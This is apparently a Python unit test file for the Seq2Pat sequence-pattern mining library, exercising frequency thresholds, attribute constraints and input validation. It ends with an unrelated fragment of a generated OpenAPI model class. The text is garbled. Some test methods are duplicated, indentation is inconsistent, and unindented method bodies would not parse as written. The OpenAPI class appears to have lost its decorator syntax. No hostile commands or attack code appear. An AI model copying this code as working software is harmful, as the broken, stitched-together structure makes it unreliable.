        gap_constraint = seq2pat.add_constraint(((- 6) <= price.gap() <= (- 1)))
        patterns = seq2pat.get_patterns(min_frequency=2)
        self.assertListEqual([['A', 'D', 2]], patterns)
    def test_min_frequency_as_1_integer(self):
        """Integer min_frequency=1 returns every pattern (occurring at least once)."""
        seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        # NOTE(review): ``price`` and ``timestamp`` are built but never used here.
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
        patterns = seq2pat.get_patterns(min_frequency=1)
        results = [['A', 'D', 2], ['B', 'A', 2], ['C', 'A', 2], ['A', 'A', 1], ['A', 'A', 'A', 1], ['A', 'A', 'A', 'D', 1], ['A', 'A', 'B', 1], ['A', 'A', 'B', 'A', 1], ['A', 'A', 'B', 'A', 'D', 1], ['A', 'A', 'B', 'D', 1], ['A', 'A', 'D', 1], ['A', 'B', 1], ['A', 'B', 'A', 1], ['A', 'B', 'A', 'D', 1], ['A', 'B', 'D', 1], ['A', 'C', 1], ['A', 'C', 'D', 1], ['B', 'A', 'D', 1], ['B', 'D', 1], ['C', 'A', 'C', 1], ['C', 'A', 'C', 'D', 1], ['C', 'A', 'D', 1], ['C', 'B', 1], ['C', 'B', 'A', 1], ['C', 'C', 1], ['C', 'C', 'D', 1], ['C', 'D', 1]]
        self.assertListEqual(patterns, results)
    def test_min_frequency_as_1dot0_float(self):
        """Float min_frequency=1.0 — presumably a 100%-support ratio — yields no patterns here."""
        seq2pat = Seq2Pat(sequences=[['A', 'A', 'B', 'A', 'D'], ['C', 'B', 'A'], ['C', 'A', 'C', 'D']])
        # NOTE(review): ``price`` and ``timestamp`` are built but never used here.
        price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
        timestamp = Attribute(values=[[1, 1, 2, 3, 3], [3, 8, 9], [2, 5, 5, 7]])
        patterns = seq2pat.get_patterns(min_frequency=1.0)
        self.assertListEqual([], patterns)
def test_string(self):
seq2pat = Seq2Pat(sequences=[['A', 'C', 'B', 'C'], ['D', 'A', 'E', 'B', 'W', 'C'], ['W', 'W', 'C', 'A', 'A', 'B', 'S', 'C'], ['D', 'A', 'C', 'B', 'A', 'C']])
patterns = seq2pat.get_patterns(min_frequency=4)
self.assertEqual(4, len(patterns))
self.assertTrue((['B', 'C', 4] in patterns))
self.assertTrue((['A', 'C', 4] in patterns))
self.assertTrue((['A', 'B', 4] in patterns))
self.assertTrue((['A', 'B', 'C', 4] in patterns))
self.assertListEqual([['A', 'B', 4], ['A', 'B', 'C', 4], ['A', 'C', 4], ['B', 'C', 4]], patterns)
def test_string_from_int(self):
seq2pat = Seq2Pat(sequences=[[1, 3, 2, 3], [4, 1, 5, 2, 10, 3], [10, 10, 3, 1, 1, 2, 9, 3], [4, 1, 3, 2, 1, 3]])
patterns = seq2pat.get_patterns(min_frequency=4)
self.assertListEqual([[1, 2, 4], [1, 2, 3, 4], [1, 3, 4], [2, 3, 4]], patterns)
def test_operator(self):
attributes = [[10, 20, 30], [40, 50], [10, 30, 60, 70]]
attribute_1 = Attribute(attributes)
c1 = (100 <= attribute_1.average() <= 500)
c2 = (200 <= attribute_1.span())
c3 = (attribute_1.span() <= 1456)
self.assertEqual(c1.lower_bound, 100)
self.assertEqual(c2.lower_bound, 200)
self.assertEqual(c3.lower_bound, None)
self.assertEqual(c1.upper_bound, 500)
self.assertEqual(c2.upper_bound, None)
self.assertEqual(c3.upper_bound, 1456)
    def test_input(self):
        """Fixture files load into lists of the expected size and row length."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        self.assertTrue((type(sequences) == list))
        self.assertTrue((len(sequences) == 52619))
        self.assertTrue((len(sequences[0]) == 5))
        attribute_file = (self.DATA_DIR + 'input_att1.txt')
        attribute_1 = read_data(attribute_file)
        self.assertTrue((type(attribute_1) == list))
        self.assertTrue((len(attribute_1) == 52619))
        self.assertTrue((len(attribute_1[0]) == 5))
    def test_input_item_variables(self):
        """Derived fixture dimensions: max row length, row count, max item value."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        m = get_max_column_size(sequences)
        n = len(sequences)
        l = get_max_value(sequences)
        self.assertEqual(161, m)
        self.assertEqual(52619, n)
        self.assertEqual(3340, l)
def test_invalid_freq(self):
sequences = [[1, 2, 3], [4, 5], [1, 3, 6, 7]]
seq2pat = Seq2Pat(sequences)
with self.assertRaises(ValueError):
seq2pat.get_patterns((- 1))
with self.assertRaises(ValueError):
seq2pat.get_patterns(0)
def test_invalid_patterns(self):
sequences = None
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
sequences = [[1, 2, 3], 'string', [1, 3, 6, 7]]
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
sequences = [[1, 2, 3], [1, 3, 6, 7], 1]
with self.assertRaises(ValueError):
seq2pat = Seq2Pat(sequences)
patterns = [set(), [1, 2, 3], [1, 3, 6, 7]]
    def test_invalid_patterns(self):
        """Invalid sequence containers raise ValueError on construction."""
        sequences = None
        with self.assertRaises(ValueError):
            seq2pat = Seq2Pat(sequences)
        sequences = [[1, 2, 3], 'string', [1, 3, 6, 7]]
        with self.assertRaises(ValueError):
            seq2pat = Seq2Pat(sequences)
        sequences = [[1, 2, 3], [1, 3, 6, 7], 1]
        with self.assertRaises(ValueError):
            seq2pat = Seq2Pat(sequences)
        patterns = [set(), [1, 2, 3], [1, 3, 6, 7]]
        # NOTE(review): the block below still constructs Seq2Pat with the
        # (invalid) ``sequences`` from above; the ``patterns`` assignments
        # look like leftovers and are never passed to Seq2Pat — confirm intent.
        with self.assertRaises(ValueError):
            patterns = [set(), 'string', 1]
            seq2pat = Seq2Pat(sequences)
def test_invalid_attributes(self):
with self.assertRaises(ValueError):
Attribute(None)
attribute = [[1, 2, 3], 'string', [1, 3, 6, 7]]
with self.assertRaises(ValueError):
Attribute(attribute)
attribute = [[1, 2, 3], [1, 3, 6, 7], 1]
with self.assertRaises(ValueError):
Attribute(attribute)
attribute = [set(), [1, 2, 3], [1, 3, 6, 7]]
with self.assertRaises(ValueError):
Attribute(attribute)
attribute = [set(), 'string', 1]
with self.assertRaises(ValueError):
Attribute(attribute)
    def test_setter(self):
        """Exercise the raw Cython PySeq2pat property setters and getters round-trip."""
        python_seq2pat = stp.PySeq2pat()
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        # NOTE(review): ``seq2pat`` is constructed but never used in this test.
        seq2pat = Seq2Pat(sequences)
        # Lower/upper bound vectors per constraint type (gap/span/average/median).
        python_seq2pat.lgap = [30]
        python_seq2pat.ugap = [900]
        python_seq2pat.lspn = [77]
        python_seq2pat.uspn = [9, 80]
        python_seq2pat.lavr = [9, 88]
        python_seq2pat.uavr = [7]
        python_seq2pat.lmed = [9, 9, 8]
        python_seq2pat.umed = [99999]
        self.assertListEqual(python_seq2pat.lgap, [30])
        self.assertListEqual(python_seq2pat.ugap, [900])
        self.assertListEqual(python_seq2pat.lspn, [77])
        self.assertListEqual(python_seq2pat.uspn, [9, 80])
        self.assertListEqual(python_seq2pat.lavr, [9, 88])
        self.assertListEqual(python_seq2pat.uavr, [7])
        self.assertListEqual(python_seq2pat.lmed, [9, 9, 8])
        self.assertListEqual(python_seq2pat.umed, [99999])
        # Attribute-index vectors for each bound vector above.
        python_seq2pat.lgapi = [0]
        python_seq2pat.ugapi = [0]
        python_seq2pat.lspni = [1]
        python_seq2pat.uspni = [1, 0]
        python_seq2pat.lavri = [0, 1]
        python_seq2pat.uavri = [0]
        python_seq2pat.lmedi = [0, 1, 2]
        python_seq2pat.umedi = [2]
        self.assertListEqual(python_seq2pat.lgapi, [0])
        self.assertListEqual(python_seq2pat.ugapi, [0])
        self.assertListEqual(python_seq2pat.lspni, [1])
        self.assertListEqual(python_seq2pat.uspni, [1, 0])
        self.assertListEqual(python_seq2pat.lavri, [0, 1])
        self.assertListEqual(python_seq2pat.uavri, [0])
        self.assertListEqual(python_seq2pat.lmedi, [0, 1, 2])
        self.assertListEqual(python_seq2pat.umedi, [2])
        # Per-attribute counters and totals.
        python_seq2pat.num_minmax = [0, 0, 0]
        python_seq2pat.num_avr = [1, 1, 1]
        python_seq2pat.num_med = [0, 1, 2]
        python_seq2pat.tot_gap = [0, 1, 0]
        python_seq2pat.tot_spn = [2, 2, 2]
        python_seq2pat.tot_avr = [0, 1, 1]
        self.assertListEqual(python_seq2pat.num_minmax, [0, 0, 0])
        self.assertListEqual(python_seq2pat.num_avr, [1, 1, 1])
        self.assertListEqual(python_seq2pat.num_med, [0, 1, 2])
        self.assertListEqual(python_seq2pat.tot_gap, [0, 1, 0])
        self.assertListEqual(python_seq2pat.tot_spn, [2, 2, 2])
        self.assertListEqual(python_seq2pat.tot_avr, [0, 1, 1])
        # Scalar problem dimensions.
        python_seq2pat.num_att = 3
        python_seq2pat.N = 200
        python_seq2pat.M = 999
        python_seq2pat.L = 89
        python_seq2pat.theta = 89
        self.assertEqual(python_seq2pat.num_att, 3)
        self.assertEqual(python_seq2pat.N, 200)
        self.assertEqual(python_seq2pat.M, 999)
        self.assertEqual(python_seq2pat.L, 89)
        self.assertEqual(python_seq2pat.theta, 89)
    def test_seq2patfinder_default(self):
        """The Cython finder built from the high-level API carries the expected internals,
        and mining is deterministic and matches the stored fixture results."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        seq2pat = Seq2Pat(sequences, max_span=None)
        attribute_file = (self.DATA_DIR + 'input_att1.txt')
        attr1_data = read_data(attribute_file)
        att1 = Attribute(attr1_data)
        attribute_file = (self.DATA_DIR + 'input_att2.txt')
        attr2_data = read_data(attribute_file)
        att2 = Attribute(attr2_data)
        cts1 = seq2pat.add_constraint((30 <= att1.gap() <= 900))
        cts2 = seq2pat.add_constraint((900 <= att1.span()))
        cts3 = seq2pat.add_constraint((30 <= att2.average() <= 70))
        cts4 = seq2pat.add_constraint((40 <= att2.median() <= 60))
        # Inspect the internal Cython implementation object directly.
        test_pf = seq2pat._get_cython_imp((- 1))
        self.assertListEqual([30], test_pf.lgap)
        self.assertListEqual([900], test_pf.ugap)
        self.assertListEqual([30], test_pf.lavr)
        self.assertListEqual([70], test_pf.uavr)
        self.assertListEqual([900], test_pf.lspn)
        self.assertListEqual([], test_pf.uspn)
        self.assertListEqual([40], test_pf.lmed)
        self.assertListEqual([0], test_pf.ugapi)
        self.assertListEqual([0], test_pf.lgapi)
        self.assertListEqual([], test_pf.uspni)
        self.assertListEqual([0], test_pf.lspni)
        self.assertListEqual([1], test_pf.uavri)
        self.assertListEqual([1], test_pf.lavri)
        self.assertListEqual([1], test_pf.umedi)
        self.assertListEqual([1], test_pf.lmedi)
        self.assertListEqual([2, 0], test_pf.num_minmax)
        self.assertListEqual([0, 2], test_pf.num_avr)
        self.assertListEqual([0, 2], test_pf.num_med)
        self.assertListEqual([0], test_pf.tot_gap)
        self.assertListEqual([0], test_pf.tot_spn)
        self.assertListEqual([1], test_pf.tot_avr)
        self.assertEqual(161, test_pf.M)
        self.assertEqual(52619, test_pf.N)
        self.assertEqual(3340, test_pf.L)
        self.assertListEqual([284871, 100], test_pf.max_attrs)
        self.assertListEqual([0, 1], test_pf.min_attrs)
        # Mining twice with the same inputs must be deterministic.
        test_patterns = seq2pat.get_patterns(0.001)
        dup_patterns = seq2pat.get_patterns(0.001)
        self.assertListEqual(test_patterns, dup_patterns)
        results_file = (self.DATA_DIR + 'default_results.txt')
        control_patterns = read_data(results_file)
        sorted_control = sort_pattern(control_patterns)
        self.assertListEqual(sorted_control, test_patterns)
        # Removing the att2 constraints must clear their internal vectors.
        cts5 = seq2pat.remove_constraint((40 <= att2.median() <= 60))
        ct6 = seq2pat.remove_constraint((30 <= att2.average() <= 70))
        test_pf = seq2pat._get_cython_imp((- 1))
        self.assertListEqual([], test_pf.umedi)
        self.assertListEqual([], test_pf.lmedi)
        self.assertListEqual([], test_pf.uavr)
        self.assertListEqual([], test_pf.uavri)
        self.assertListEqual([0], test_pf.num_med)
        one_constraint_result = seq2pat.get_patterns(0.001)
        results_file = (self.DATA_DIR + 'one_constraint_results.txt')
        control_patterns = read_data(results_file)
        sorted_controls = sort_pattern(control_patterns)
        self.assertListEqual(sorted_controls, one_constraint_result)
    def test_input_one_attribute_constraint(self):
        """Mining with only att1 constraints matches the one-constraint fixture."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        seq2pat = Seq2Pat(sequences, max_span=None)
        attribute_file = (self.DATA_DIR + 'input_att1.txt')
        attr1_data = read_data(attribute_file)
        att1 = Attribute(attr1_data)
        cts1 = seq2pat.add_constraint((30 <= att1.gap() <= 900))
        cts2 = seq2pat.add_constraint((900 <= att1.span()))
        test_patterns = seq2pat.get_patterns(0.001)
        results_file = (self.DATA_DIR + 'one_constraint_results.txt')
        control_patterns = read_data(results_file)
        sorted_controls = sort_pattern(control_patterns)
        self.assertListEqual(sorted_controls, test_patterns)
        # And it must differ from the fully-constrained default fixture.
        self.assertFalse((test_patterns == read_data((self.DATA_DIR + 'default_results.txt'))))
    def test_input_no_constraint(self):
        """Unconstrained mining matches the no-constraints fixture."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        seq2pat = Seq2Pat(sequences, max_span=None)
        test_patterns = seq2pat.get_patterns(0.01)
        results_file = (self.DATA_DIR + 'no_constraints_results.txt')
        control_patterns = read_data(results_file)
        sorted_results = sort_pattern(control_patterns)
        self.assertListEqual(sorted_results, test_patterns)
        # And it must differ from the fully-constrained default fixture.
        self.assertFalse((test_patterns == read_data((self.DATA_DIR + 'default_results.txt'))))
    def test_input_diff_constraint(self):
        """Mining with a different constraint set matches its dedicated fixture."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        seq2pat = Seq2Pat(sequences, max_span=None)
        attribute_file = (self.DATA_DIR + 'input_att1.txt')
        attr1_data = read_data(attribute_file)
        att1 = Attribute(attr1_data)
        attribute_file = (self.DATA_DIR + 'input_att2.txt')
        attr2_data = read_data(attribute_file)
        att2 = Attribute(attr2_data)
        cts1 = seq2pat.add_constraint((20 <= att1.gap() <= 1000))
        cts2 = seq2pat.add_constraint((800 <= att1.span() <= 3700))
        cts3 = seq2pat.add_constraint((20 <= att2.average() <= 80))
        cts4 = seq2pat.add_constraint((30 <= att2.median() <= 70))
        test_patterns = seq2pat.get_patterns(0.001)
        results_file = (self.DATA_DIR + 'diff_constraints_results.txt')
        control_patterns = read_data(results_file)
        sorted_control = sort_pattern(control_patterns)
        self.assertListEqual(sorted_control, test_patterns)
    def test_input_no_lower_constraint(self):
        """Upper-bound-only constraints match the no-lower-bound fixture."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        seq2pat = Seq2Pat(sequences, max_span=None)
        attribute_file = (self.DATA_DIR + 'input_att1.txt')
        attr1_data = read_data(attribute_file)
        att1 = Attribute(attr1_data)
        attribute_file = (self.DATA_DIR + 'input_att2.txt')
        attr2_data = read_data(attribute_file)
        att2 = Attribute(attr2_data)
        cts1 = seq2pat.add_constraint((att1.gap() <= 900))
        cts2 = seq2pat.add_constraint((att1.span() <= 3600))
        cts3 = seq2pat.add_constraint((att2.average() <= 70))
        cts4 = seq2pat.add_constraint((att2.median() <= 60))
        test_patterns = seq2pat.get_patterns(0.001)
        results_file = (self.DATA_DIR + 'no_lower_constraint_results.txt')
        control_patterns = read_data(results_file)
        sorted_control = sort_pattern(control_patterns)
        self.assertListEqual(sorted_control, test_patterns)
    def test_input_no_upper_constraint(self):
        """Lower-bound-only constraints match the no-upper-bound fixture."""
        patterns_file = (self.DATA_DIR + 'input.txt')
        sequences = read_data(patterns_file)
        seq2pat = Seq2Pat(sequences, max_span=None)
        attribute_file = (self.DATA_DIR + 'input_att1.txt')
        attr1_data = read_data(attribute_file)
        att1 = Attribute(attr1_data)
        attribute_file = (self.DATA_DIR + 'input_att2.txt')
        attr2_data = read_data(attribute_file)
        att2 = Attribute(attr2_data)
        cts1 = seq2pat.add_constraint((30 <= att1.gap()))
        cts2 = seq2pat.add_constraint((900 <= att1.span()))
        cts3 = seq2pat.add_constraint((30 <= att2.average()))
        cts4 = seq2pat.add_constraint((40 <= att2.median()))
        test_patterns = seq2pat.get_patterns(0.01)
        results_file = (self.DATA_DIR + 'no_upper_constraint_results.txt')
        control_patterns = read_data(results_file)
        sorted_control = sort_pattern(control_patterns)
        self.assertListEqual(sorted_control, test_patterns)
def test_compare_results(self):
a = [1, 2]
b = [4, 5]
c = [6, 7, 8]
list_a = [a, b, c]
list_b = [c]
(a_b, b_a) = compare_results(list_a, list_b)
self.assertListEqual([a, b], a_b)
self.assertEqual([], b_a)
def test_attribute_mapping(self):
sequences = [[1, 2, 3], [4, 5], [1, 3, 6, 7]]
seq2pat = Seq2Pat(sequences)
attribute = [[1, 2, 3, 5], [4, 5], [1, 3, 6, 7]]
att1 = Attribute(attribute)
with self.assertRaises(ValueError):
seq2pat.add_constraint((0 <= att1.gap() <= 10))
attribute = [[1, 2, 3, 5], [4], [1, 3, 6, 7]]
att1 = Attribute(attribute)
with self.assertRaises(ValueError):
seq2pat.add_constraint((0 <= att1.gap() <= 10))
    def test_gap_inequality(self):
        """Gap bounds are inclusive: window edges at 10/11/19/20 over gaps of 10 and 20."""
        sequences = [[11, 12, 13]]
        seq2pat = Seq2Pat(sequences)
        unconstrained_result = seq2pat.get_patterns(1)
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
        attributes = [[10, 20, 30]]
        att1 = Attribute(attributes)
        # Consecutive gaps are 10; the (11, 13) gap is 20 — window (11, 19) excludes both.
        gap_constraint = seq2pat.add_constraint((11 <= att1.gap() <= 19))
        self.assertListEqual([], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((11 <= att1.gap() <= 19))
        gap_constraint = seq2pat.add_constraint((10 <= att1.gap() <= 11))
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((10 <= att1.gap() <= 11))
        gap_constraint = seq2pat.add_constraint((11 <= att1.gap() <= 20))
        self.assertListEqual([[11, 13, 1]], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((11 <= att1.gap() <= 20))
        seq2pat.add_constraint((10 <= att1.gap() <= 20))
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
    def test_span_inequality(self):
        """Span bounds are inclusive over the attribute range of a pattern."""
        sequences = [[11, 12, 13]]
        seq2pat = Seq2Pat(sequences)
        unconstrained_result = seq2pat.get_patterns(1)
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
        attributes = [[10, 20, 30]]
        att1 = Attribute(attributes)
        span_constraint = seq2pat.add_constraint((11 <= att1.span() <= 19))
        self.assertListEqual([], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((11 <= att1.span() <= 19))
        span_constraint = seq2pat.add_constraint((10 <= att1.span() <= 19))
        self.assertListEqual([[11, 12, 1], [12, 13, 1]], seq2pat.get_patterns(1))
        # NOTE(review): the removal below uses bounds (10, 11) although the
        # constraint added above was (10, 19) — presumably remove_constraint
        # matches more loosely than exact bounds; confirm against the API.
        seq2pat.remove_constraint((10 <= att1.span() <= 11))
        span_constraint = seq2pat.add_constraint((11 <= att1.span() <= 20))
        self.assertListEqual([[11, 12, 13, 1], [11, 13, 1]], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((11 <= att1.span() <= 20))
        span_constraint = seq2pat.add_constraint((10 <= att1.span() <= 20))
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
    def test_average_inequality(self):
        """Average bounds are inclusive over the attribute mean of a pattern."""
        sequences = [[11, 12, 13]]
        seq2pat = Seq2Pat(sequences)
        unconstrained_result = seq2pat.get_patterns(1)
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
        attributes = [[10, 20, 30]]
        att1 = Attribute(attributes)
        gap_constraint = seq2pat.add_constraint((16 <= att1.average() <= 19))
        self.assertListEqual([], seq2pat.get_patterns(1))
        # NOTE(review): the removal below uses bounds (16, 24) although the
        # constraint added above was (16, 19) — presumably remove_constraint
        # matches more loosely than exact bounds; confirm against the API.
        seq2pat.remove_constraint((16 <= att1.average() <= 24))
        gap_constraint = seq2pat.add_constraint((15 <= att1.average() <= 19))
        self.assertListEqual([[11, 12, 1]], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((15 <= att1.average() <= 19))
        seq2pat.add_constraint((16 <= att1.average() <= 20))
        self.assertListEqual([[11, 12, 13, 1], [11, 13, 1]], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((16 <= att1.average() <= 20))
        seq2pat.add_constraint((15 <= att1.average() <= 25))
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
    def test_median_inequality(self):
        """Median bounds are inclusive over the attribute median of a pattern."""
        sequences = [[11, 12, 13]]
        seq2pat = Seq2Pat(sequences)
        unconstrained_result = seq2pat.get_patterns(1)
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
        attributes = [[10, 20, 30]]
        att1 = Attribute(attributes)
        gap_constraint = seq2pat.add_constraint((16 <= att1.median() <= 19))
        self.assertListEqual([], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((16 <= att1.median() <= 19))
        gap_constraint = seq2pat.add_constraint((15 <= att1.median() <= 19))
        self.assertListEqual([[11, 12, 1]], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((15 <= att1.median() <= 19))
        seq2pat.add_constraint((16 <= att1.median() <= 20))
        self.assertListEqual([[11, 12, 13, 1], [11, 13, 1]], seq2pat.get_patterns(1))
        seq2pat.remove_constraint((16 <= att1.median() <= 20))
        seq2pat.add_constraint((15 <= att1.median() <= 25))
        self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], seq2pat.get_patterns(1))
def test_simultaneaous_mining(self):
sequences = [[11, 12, 13]]
seq2pat = Seq2Pat(sequences)
seq2pat2 = Seq2Pat(sequences)
unconstrained_result = seq2pat.get_patterns(1)
unconstrained_result2 = seq2pat2.get_patterns(1)
self.assertListEqual(unconstrained_result, unconstrained_result2)
self.assertListEqual([[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]], unconstrained_result)
def test_min_frequence_negative(self):
    """A negative min_frequency is rejected with ValueError."""
    miner = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
    price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
    with self.assertRaises(ValueError):
        miner.get_patterns(min_frequency=-1)
def test_min_frequence_zero_int(self):
    """An integer min_frequency of zero is rejected with ValueError."""
    miner = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
    with self.assertRaises(ValueError):
        miner.get_patterns(min_frequency=0)
def test_min_frequence_zero_float(self):
    """A float min_frequency of zero is rejected with ValueError."""
    miner = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
    with self.assertRaises(ValueError):
        miner.get_patterns(min_frequency=0.0)
def test_min_frequence_float_large(self):
    """A float min_frequency above 1.0 is rejected, even with a constraint added."""
    miner = Seq2Pat(sequences=[[1, 1, 2, 1, 4], [3, 2, 1], [3, 1, 3, 4]])
    price = Attribute(values=[[5, 5, 3, 8, 2], [1, 3, 3], [4, 5, 2, 1]])
    miner.add_constraint(-6 <= price.gap())
    with self.assertRaises(ValueError):
        miner.get_patterns(min_frequency=2.5)
def test_sequence_with_empty_list(self):
    """Empty inner lists are rejected for both sequences and attribute values."""
    with self.assertRaises(ValueError):
        Seq2Pat([[11, 12, 13], []])
    with self.assertRaises(ValueError):
        Attribute([[11, 12, 13], []])
def test_min_frequence_float_one_row(self):
    """With a single row, a fractional min_frequency fails but 1.0 succeeds."""
    miner = Seq2Pat([[11, 12, 13]])
    with self.assertRaises(ValueError):
        miner.get_patterns(min_frequency=0.9)
    expected = [[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]]
    self.assertListEqual(expected, miner.get_patterns(min_frequency=1.0))
def test_min_frequence_float_theta_ge_one(self):
    """A fractional min_frequency that maps to at least one row is accepted."""
    miner = Seq2Pat([[11, 12, 13], [11, 12, 13, 14]])
    expected_all = [[11, 12, 2], [11, 12, 13, 2], [11, 13, 2], [12, 13, 2], [11, 12, 13, 14, 1], [11, 12, 14, 1], [11, 13, 14, 1], [11, 14, 1], [12, 13, 14, 1], [12, 14, 1], [13, 14, 1]]
    self.assertListEqual(expected_all, miner.get_patterns(min_frequency=0.9))
    att1 = Attribute([[10, 20, 30], [10, 20, 30, 40]])
    # Restricting consecutive gaps to [10, 11] prunes part of the result.
    miner.add_constraint(10 <= att1.gap() <= 11)
    expected_constrained = [[11, 12, 2], [11, 12, 13, 2], [12, 13, 2], [11, 12, 13, 14, 1], [12, 13, 14, 1], [13, 14, 1]]
    self.assertListEqual(expected_constrained, miner.get_patterns(min_frequency=0.9))
def test_min_frequence_float_theta_le_one(self):
    """A fractional min_frequency too small for the row count is rejected."""
    miner = Seq2Pat([[11, 12, 13], [11, 12, 13, 14]])
    with self.assertRaises(ValueError):
        miner.get_patterns(min_frequency=0.4)
def test_num_rows_ge_one(self):
    """Mining requires at least one sequence row."""
    # Constructing with no sequences at all is rejected up front.
    with self.assertRaises(ValueError):
        Seq2Pat([])
    miner = Seq2Pat(sequences=[[11, 12, 13]])
    # Force the internal row count to an invalid value to hit the guard.
    miner._num_rows = 0
    with self.assertRaises(ValueError):
        miner.get_patterns(min_frequency=1)
def test_repeated_calls_seq2pat(self):
    """Repeated get_patterns calls are stable and honor a changed frequency."""
    miner = Seq2Pat([[11, 12, 13], [11, 12, 13, 14]])
    expected = [[11, 12, 2], [11, 12, 13, 2], [11, 13, 2], [12, 13, 2], [11, 12, 13, 14, 1], [11, 12, 14, 1], [11, 13, 14, 1], [11, 14, 1], [12, 13, 14, 1], [12, 14, 1], [13, 14, 1]]
    # Two identical calls must produce identical results.
    self.assertListEqual(expected, miner.get_patterns(0.9))
    self.assertListEqual(expected, miner.get_patterns(0.9))
    # A stricter frequency drops the singleton-support patterns.
    self.assertListEqual([[11, 12, 2], [11, 12, 13, 2], [11, 13, 2], [12, 13, 2]], miner.get_patterns(2))
def test_repeated_calls_seq2pat_add_remove_ct(self):
    """Removing previously added constraints restores the unconstrained result."""
    miner = Seq2Pat([[11, 12, 13]])
    everything = [[11, 12, 1], [11, 12, 13, 1], [11, 13, 1], [12, 13, 1]]
    self.assertListEqual(everything, miner.get_patterns(1))
    att1 = Attribute([[10, 20, 30]])
    ct_median = miner.add_constraint(15 <= att1.median() <= 19)
    ct_average = miner.add_constraint(5 <= att1.average() <= 15)
    # Both constraints together admit only a single pattern.
    self.assertListEqual([[11, 12, 1]], miner.get_patterns(1))
    miner.remove_constraint(ct_median)
    miner.remove_constraint(ct_average)
    self.assertListEqual(everything, miner.get_patterns(1))
def test_max_span(self):
    """The default max_span bounds the number of mined patterns."""
    miner = Seq2Pat([[11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23]])
    self.assertEqual(2546, len(miner.get_patterns(1)))
def test_max_span_none(self):
    """Disabling max_span yields the full, larger pattern set."""
    miner = Seq2Pat([[11, 12, 13, 14, 15, 16, 17, 18, 19, 20, 21, 22, 23]], max_span=None)
    self.assertEqual(8178, len(miner.get_patterns(1)))
def test_max_span_customize(self):
    """A custom max_span caps both the count and the length of patterns."""
    miner = Seq2Pat([list(range(11, 31))], max_span=13)
    patterns = miner.get_patterns(1)
    self.assertEqual(36843, len(patterns))
    # Longest pattern is the 13-item span plus its frequency entry.
    self.assertEqual(14, max(len(p) for p in patterns))
def test_sequence_contain_zeros(self):
    """Zero is not a valid item inside input sequences."""
    with self.assertRaises(ValueError):
        Seq2Pat([[1, 0], [0, 1]])
class ResponseObject(ModelNormal):
    """Generated OpenAPI model describing a response object resource.

    NOTE(review): the bare ``_property`` and ``_js_args_to_python_args``
    lines below look like decorators whose leading ``@`` was lost (most
    likely ``@cached_property`` and ``@convert_js_args_to_python_args`` in
    the original generated source) — as written they are no-op expression
    statements, so the defs they precede are plain functions/methods.
    Likewise ``_from_openapi_data`` appears to be missing ``@classmethod``
    (it takes ``cls``). Confirm against the generator template before
    relying on attribute-style access to these members.
    """
    # No enum-restricted property values on this model.
    allowed_values = {}
    # No range/length validations on this model.
    validations = {}
    _property
    def additional_properties_type():
        # Any JSON-compatible Python type is accepted for undeclared properties.
        return (bool, date, datetime, dict, float, int, list, str, none_type)
    _nullable = False
    _property
    def openapi_types():
        """Map each attribute name to the tuple of Python types it accepts."""
        return {'cache_condition': (str, none_type), 'content': (str,), 'content_type': (str, none_type), 'name': (str,), 'status': (str,), 'response': (str,), 'request_condition': (str, none_type)}
    _property
    def discriminator():
        # No polymorphic discriminator for this schema.
        return None
    # Python attribute name -> JSON key (identical here).
